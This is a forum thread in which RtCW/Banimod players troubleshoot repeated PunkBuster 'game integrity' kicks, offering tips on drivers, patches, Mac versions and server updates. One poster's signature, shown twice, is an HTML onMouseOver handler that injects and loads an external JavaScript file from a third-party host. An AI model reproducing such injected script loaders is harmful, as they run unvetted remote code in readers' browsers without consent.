kicked for game integrity?

Discussion for Banimod players

Moderators: Forum moderators, developers

cshafer

kicked for game integrity?

Post by cshafer »

Got error 20004, kicked for game integrity via punkbuster. And keep getting kicked for it. Can't figure out why. Anyone have a fix or idea?

thanks
cshafer
Long-bow

Re: kicked for game integrity?

Post by Long-bow »

[quote="cshafer"]Got error 20004, kicked for game integrity via punkbuster. And keep getting kicked for it. Can't figure out why. Anyone have a fix or idea?

thanks
cshafer[/quote]

Have you changed your video card or sound card? do you have a ti card these are things that i and friends had to deal with.
Try updaiting wolf,or try updaiting your drivers in your p.c..
Good luck
Rain

Post by Rain »

If you're repeatedly getting kicked for game integrity, your rtcw executable may be corrupt for some reason. Try reinstalling the patch and/or running a virus scan (although most virus authors nowadays are too lazy to make anything that actually infects other programs.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
gotenks

Post by gotenks »

Rain wrote: (although most virus authors nowadays are too lazy to make anything that actually infects other programs.)
did you just insult them for being nice to most windoze users? :shock:
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
cshafer

Post by cshafer »

I'm a mac user, don't know if that's what's screwing me. Only thing I can think is to clean install. I get kicked from every server except KX3 bani beach. Any advice would be greatly appreciated. Thanks.
Rain

Post by Rain »

cshafer wrote:I'm a mac user
Oh dear. That's a whole different bag of worms.

It's entirely possible that EvenBalance broke PB for the Mac version of RtCW and nobody's noticed yet. If you have any friends who also play RtCW on the Mac, do they have similar problems? You might try mailing EvenBalance.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
RoadKillPuppy

Post by RoadKillPuppy »

PB got updated a lot over the past few days.

It could be that
- players are in the middle of an autoupdate (kicked)
- players are using an older version then the server (kicked)
- server is on an older version then the players

With the last option, the pb-client start spamming "server is on a low level" messages all over the server (=really annoying)
Admins can do a pb_sv_update followed by a pb_sv_restart

RKP
eclipse+

Post by eclipse+ »

Game integrity means shit, I get kicked every now and then for the same thing. Don't worry about it.
::Amish World Order::#awo @gamesurge.net::http://www.amishworldorder.org
duke'ku

Post by duke'ku »

Rain wrote:
cshafer wrote:I'm a mac user
Oh dear. That's a whole different bag of worms.

It's entirely possible that EvenBalance broke PB for the Mac version of RtCW and nobody's noticed yet. If you have any friends who also play RtCW on the Mac, do they have similar problems? You might try mailing EvenBalance.
If it really appears to be a Mac problem, I'd be happy to reinstall RTCW on my ibook and test.
[FuN] scott

Post by [FuN] scott »

for et you mustt be a admin of your box. i presume the same is true for any pb enabled game.